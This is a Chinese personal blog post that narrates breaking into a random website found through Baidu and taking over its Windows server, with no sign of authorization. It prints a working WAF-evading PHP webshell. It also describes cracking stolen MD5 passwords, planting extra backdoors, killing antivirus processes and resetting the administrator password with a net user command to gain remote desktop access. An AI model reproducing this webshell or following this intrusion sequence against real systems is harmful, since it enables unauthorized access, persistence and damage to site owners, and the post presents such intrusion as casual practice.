Kingkk's Blog.

第一次远程桌面的日站过程

2018/02/21 Share

前言

既然都说日站孰能生巧,日多了才能出感觉,今天就在找一些网站进行测试。
然后无意间百度出了一个功能很奇怪的网页,居然能查看目录。
然后折腾了一天,终于能远程登录了。就记录一下,算是一次实战经验。

正文

一开始看到的网页是这个样子的
一看这url,path参数不就是路径名么。而且好像还可以查看非网站目录,应该是phpstudy的原因,导致权限较高。
虽然能看目录,但是看不了里面的内容,那就翻翻有没有什么备份文件之类的,然后找呀找 找到了个.sql文件。
然后通过浏览器访问一下,导出来,加到自己数据库看看有什么数据 然后随便找了个用户,密码用md5解密一下,123456

进主页登录一下看看有什么数据
危害最大的应该就是上传漏洞了,于是就先测试了下上传功能。 随便上传了个class.php竟然直接成功了,而且发现连文件名都不改,直接传上去了
既然这样,那就直接上一句话啊,还等什么
可是上了当真的上一句话的时候,好像有防火墙,把文件内容都给改了,还会把名称变成.log

然后没办法,试试改下文件名php3,php5可是phpstudy好像不解析,还因为上传恶意代码被各种banip,自己的ip全挂了,还去网上找了公用的Ip代理
最后,从土司上找的一句话成功过防火墙,上传成功 assert.php

1
2
3
4
5
<?php
${"function"}=substr(\_\_FILE\_\_,-10,-4);;
${"command"}=$_POST\[cmd\];
$function($command);
?>

后来发现有个局限,就是文件名上传之后不能被更改,因为是取了文件名作为函数关键字,不过恰巧这里不改文件名
然后成功上了菜刀 上了菜刀后,习惯性多加几个后门,以防这里被删
后来想上传个大马,发现还是会被防火墙拦截,还有被ban了,难受
后来进菜刀自带的命令行,由于是phpstudy的原因,权限还蛮高,把那几个杀软全给kill了
接下来就是netstat看看端口

没有3389,但是10086这种奇葩的端口,应该就是远程桌面的 弱口令没成功,然后想着添加用户,返回执行成功,可是一直添加不上去,最后直接修改了管理员密码

1
net user administrator kingkk

成功连上
至于内网漫游的话,其实并不怎么懂内网渗透,而且查了下ip是阿里云的,于是也就没往下走了,至少这台机子已经拿下了,后来翻了翻并没有什么有价值的东西,扫兴

总结

虽然写起来轻松,实际测试的时候真的弄了好久,可能也是底子不怎么好。被banip真的很难受。
而且真的觉得运气好,是网站管理员自己放的几个高危页面进去的(后来发现一开始的同页面下还有直接执行命令行的页面),上传什么都完全没做过滤。
算是难得的一次拿下远程桌面的渗透测试。

CATALOG
  1. 1. 前言
  2. 2. 正文
  3. 3. 总结